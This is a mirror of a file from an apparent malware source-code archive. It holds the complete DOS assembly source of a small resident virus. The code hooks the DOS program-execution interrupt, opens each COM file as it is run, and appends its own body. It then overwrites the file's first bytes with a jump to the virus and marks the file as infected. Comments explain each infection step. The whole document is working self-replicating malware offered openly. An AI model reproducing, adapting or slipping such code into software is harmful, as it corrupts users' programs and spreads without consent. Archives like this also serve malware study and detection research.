mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-29 18:32:28 +00:00
82 lines
1.7 KiB
NASM
82 lines
1.7 KiB
NASM
VSize = 085h
|
|
|
|
Code Segment
|
|
Assume CS:Code
|
|
Org 600h
|
|
|
|
Bytes db 0CDh,20h,90h,90h
|
|
|
|
Start: mov si, 0100h
|
|
mov bx, offset Int21
|
|
mov cx, 0050h
|
|
mov di, si
|
|
add si, [si+2]
|
|
push di
|
|
movsw
|
|
movsw
|
|
mov es, cx
|
|
cmpsb
|
|
je StartFile
|
|
dec si
|
|
dec di
|
|
rep movsw
|
|
mov es, cx
|
|
xchg ax, bx
|
|
xchg ax, cx
|
|
Loop0: xchg ax, cx
|
|
xchg ax, word ptr es:[di-120h]
|
|
stosw
|
|
jcxz Loop0
|
|
xchg ax, bx
|
|
StartFile:
|
|
push ds
|
|
pop es
|
|
ret
|
|
|
|
Int21: cmp ax, 4B00h
|
|
jne End21
|
|
Exec: push ax bx dx ds es
|
|
mov ax, 3D02h
|
|
call DoInt21
|
|
jc EndExec
|
|
cbw ; Zero AH
|
|
cwd ; Zero DX
|
|
mov bx, si ; Move handle to BX
|
|
mov ds, ax ; Set DS and ES to 60h,
|
|
mov es, ax ; the virus data segment
|
|
mov ah, 3Fh ; Read first 4 bytes
|
|
int 69h
|
|
mov al, 4Dh
|
|
scasb ; Check for 4D5Ah or infected file mark
|
|
je Close ; .EXE or already infected
|
|
mov al, 2
|
|
call LSeek ; Seek to the end, SI now contains file size
|
|
mov cl, VSize ; Virus size in CX, prepare to write
|
|
int 69h ; AH is 40h, i.e. Write operation
|
|
mov ax, 0E94Dh ; Virus header in AX
|
|
stosw ; Store it
|
|
xchg ax, si ; Move file size in AX
|
|
stosw ; Complete JMP instruction
|
|
xchg ax, dx ; Zero AX
|
|
call LSeek ; Seek to the beginning
|
|
int 69h ; AH is 40h, write the virus header
|
|
Close: mov ah,3Eh ; Close the file
|
|
int 69h
|
|
EndExec: pop es ds dx bx ax
|
|
End21: jmp dword ptr cs:[69h * 4]
|
|
|
|
LSeek: mov ah, 42h ; Seek operation
|
|
cwd ; Zero DX
|
|
DoInt21: xor cx, cx ; External entry for Open, zero cx
|
|
int 69h
|
|
mov cl, 4 ; 4 bytes will be read/written
|
|
xchg ax, si ; Store AX in SI
|
|
mov ax, 4060h ; Prepare AH for Write
|
|
xor di, di ; Zero DI
|
|
ret
|
|
|
|
VLen = $ - offset Bytes
|
|
|
|
Code EndS
|
|
End
|